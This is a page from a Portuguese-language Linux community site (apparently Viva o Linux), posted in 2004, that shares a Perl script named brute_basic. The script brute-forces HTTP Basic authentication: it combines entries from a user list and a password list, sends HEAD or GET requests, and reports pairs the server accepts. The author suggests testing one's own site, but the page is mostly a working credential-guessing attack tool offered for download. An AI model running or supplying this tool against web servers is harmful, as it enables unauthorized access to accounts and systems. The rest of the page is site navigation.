brute_basic

Publicado por Marcelo 25/01/2004

[ Hits: 6.512 ]

Download brute_basic

0 0
Denuncie   Favoritos   Indicar  



Script que faz brute-force em autenticação via web do tipo Basic (digest ainda não foi incluído), o script precisa de duas listas de nomes, para usuários e senhas, você pode escolher entre método HEAD e GET (alguns sites bloqueiam HEAD), mas como o script ainda não trabalha com threads, ele é extremamente lento para grandes brute-forces, por isso é mais recomendado para testar o seu próprio website, o script utiliza HTTP 1.1, espero que em próximas versões eu inclua threads...

  



Esconder código-fonte

#!/usr/bin/perl
use Socket;
use IO::Socket;
use MIME::Base64;
if ($ARGV[3] =~ /g/) { $metodo='GET'; print "Utilizando método GET ao invés de H
EAD\n"; }
else { $metodo='HEAD'; }
open(logins,$ARGV[1]);
@url=split(/\//,$ARGV[0]);
$get='/';
$ip=gethostbyname($url[0]);
if ($ip) { $ip=inet_ntoa($ip); }
else {
 print "Erro no DNS ao tentar resolver $url[0]!\n";
 exit(1);
}
for ($i=1;$url[$i];$i++) {
 $get="$get/$url[$i]";
}
if (substr($ARGV[0],(length($ARGV[0])-1)) eq '/') { $get="$get/"; }
print "Iniciando tentativa de brute-force em $url[0]\n";
for ($nl=0;($user=<logins>);$nl++) {
 chop $user;
 close(senhas);
 open(senhas,$ARGV[2]);
 for ($np=0;($senha=<senhas>);$np++) {
  chop $senha;
  $final=encode_base64("$user:$senha");
  $sock=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>80,Timeout=>3);
  if ($sock) { print $sock "$metodo $get HTTP/1.1\nHost: $url[0]\nAuthorization:
 Basic $final\n\n"; }
  @div=split(/ /,<$sock>);
  if ($div[1] eq '403') {
   print "Forbidden retornado do servidor, pode ser um anti brute-force\n";
  }
  elsif ($div[1] eq '405') {
   print "O método $metodo não é permitido pelo servidor:\n";
   if ($metodo eq 'HEAD') {
    print "Tente usar a opção -g no final, que utiliza GET";
   }
   else {
    print "Alguma coisa muito estranha está acontecendo... o servidor não suporta o método GET, não é impossível, mas simplesmente inútil e impede a navegação normal. Verifique se está tudo certo e se o site é navegável!";
   }
   print "\nFechando o brute-force.\n";
   exit(1);
  }
  else {
   if ($div[1] ne '401') {
    print "$user:$senha -> OK! <-> Retorno: $div[1]\n";
    $a++;
   }
  }
#  print "$div[0] $div[1] $div[2]\n";
  close($sock);
 }
}
if (!$a) { $a=0; }
print "Programa terminado, combinações tentadas: ".($nl*$np).", senhas achadas: $a\n";

Scripts recomendados

Testando servers a HTMLSCRIPT

Monitor de portas

Multi Brute Force

Script de Analise do Syslog SNORT

Brutal Force Attack


  

Comentários

Nenhum comentário foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Cirurgia para acelerar o openSUSE em HD externo via USB

Void Server como Domain Control

Modo Simples de Baixar e Usar o bash-completion

Instalar/habilitar o Linux nativo dentro do Windows com WSL (Windows Subsystem for Linux - Subsistema do Windows para Linux)

Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante

Dicas

Como impedir exclusão de arquivos por outros usuários no (Linux)

Cirurgia no Linux Mint em HD Externo via USB

Anúncio do meu script de Pós-Instalação do Ubuntu

Instalar Webmin no Redhat e derivados

Ativar a interface de administração cockpit

Tópicos

Formas seguras de instalar Debian Sid (2)

Duas Pasta Pessoal Aparecendo no Ubuntu 24.04.3 LTS (12)

Alguém pode me indicar um designer freelancer? [RESOLVIDO] (5)

Alguém executou um rm e quase mata a Pixar! (3)

Por que passar nas disciplinas da faculdade é ruim e ser reprovado é b... (6)

Top 10 do mês

Scripts

[Python] Cadastro de Distros

[Shell Script] Pós Instalação Fedora 43+

[Shell Script] Task Manager para Terminal

[Shell Script] Atualizar Debian versão 2.0

[Shell Script] fuckdrive - zerador de unidades

A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

Site hospedado por: